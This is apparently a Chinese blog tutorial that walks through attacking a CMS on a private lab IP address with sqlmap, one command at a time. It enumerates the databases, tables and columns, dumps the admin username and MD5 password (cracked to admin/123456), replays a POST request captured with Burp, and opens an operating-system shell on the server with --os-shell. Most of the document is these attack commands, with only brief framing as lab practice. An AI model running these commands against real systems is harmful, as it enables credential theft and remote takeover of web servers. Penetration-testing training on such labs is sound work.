SQLmap使用

文章目录

利用sqlmap 注入得到cms网站后台管理员账密

获取数据库名称

在kali中输入sqlmap命令,打开sqlmap,然后输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs --batch

结果如下:

获取cms数据库的表名

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 --dbs -D "cms" --tables --batch

结果如下:

得到cms中的所有表名

获取users表中的字段(内容)

输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" --columns --batch

结果如下,users表中有三个字段:

获取username字段和password字段的内容

即获取账号密码,输入下面命令:

复制代码
sqlmap -u http://10.9.75.33/cms/show.php?id=33 -D "cms" -T "cms_users" -C "username,password" --dump

在弹出的两次交互信息中输入n,得到账号和md5密码密文:

口算md5密文(其实是用工具解密),得到用户名和密码:

admin

123456

salmap破解psot请求数据包

在后台网页用火狐代理、bp抓包,在http history中查看抓到的数据包,将抓到的post请求包复制

输入下面命令,在tmp目录下新建一个txt文件并用vim编辑器编辑,将post数据包的内容放入txt文件中:

复制代码
touch /tmp/post.txt

vim /tmp/post.txt

命令模式下保存退出

输入下面命令破解post请求包:

复制代码
salmap -r /tmp/post.txt

在交互式命令时回车,是否追踪302输入no:

耐心等待完成,显示了两种注入方法,报错注入和布尔盲注:

爆破密码:

复制代码
sqlmap -r /tmp/post.txt -D "cms" -T "cms_users" -C "username,password" --dump

爆破成功:

salmap获取getshell

在kali控制台输入下面命令:

复制代码
sqlmap -u "http://10.9.75.33/cms/show.php?id=33" --os-shell

选择语言:

选择路径,2是自选路径,选择2:

路径填:

复制代码
c:/phpstudy/www/

获取成功:

相关推荐
零零信安14 天前
零零信安荣登数世咨询《新质·数字安全专精百强(2026)》暗网情报领域,彰显专业实力与创新引领
安全·网络安全·数据泄露·暗网·零零信安
憧憬成为web高手14 天前
l33t-hoster
学习·web安全·网络安全
HackTwoHub14 天前
Sqli-Scanner SQL注入SKILL自动化挖掘SQL注入,零依赖自动化SQL注入挖掘,赏金猎人
数据库·人工智能·sql·web安全·网络安全·自动化·系统安全
爱网络爱Linux14 天前
网络安全与渗透测试实用工具大全
web安全·网络安全·信息安全·cisp-pte·cisp·cissp
xsc-xyc14 天前
用 Tailscale + Syncthing 实现手机、电脑与 NAS 的跨网络文件同步
linux·网络·网络安全·智能手机·电脑
持敬chijing14 天前
Web渗透之SQL注入-常用sql语句
sql·安全·web安全·网络安全
Chengbei1114 天前
AISec真正拟人化全自动渗透工具!支持浏览器交互全自动化挖掘,SQL注入、XSS、越权等。
sql·安全·web安全·网络安全·自动化·系统安全·xss
X7x514 天前
深度拆解网络安全“闭环”之王——APPDRR模型
网络安全·网络攻击模型·安全威胁分析·安全架构·appdrr模型
Inhand陈工14 天前
污水泵站PLC数据上云实战:西门子PLC + 映翰通IG502 + DM平台全流程
人工智能·物联网·网络安全·阿里云·信息与通信·iot
X7x514 天前
一文讲透PADIMEE模型
网络安全·网络攻击模型·安全威胁分析·安全架构·padimee模型